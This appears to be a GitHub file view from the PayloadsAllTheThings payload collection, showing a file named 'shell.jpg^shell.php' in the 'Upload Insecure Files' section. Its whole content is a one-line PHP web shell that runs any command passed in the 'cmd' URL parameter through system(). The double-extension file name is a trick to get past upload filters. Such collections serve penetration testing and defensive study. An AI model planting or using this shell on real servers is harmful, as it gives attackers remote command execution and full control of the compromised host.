Files
PayloadsAllTheThings/Upload Insecure Files/Extension PHP/shell.jpg^shell.php
T

2 lines
44 B
PHP

<?php echo "Shell";system($_GET['cmd']); ?>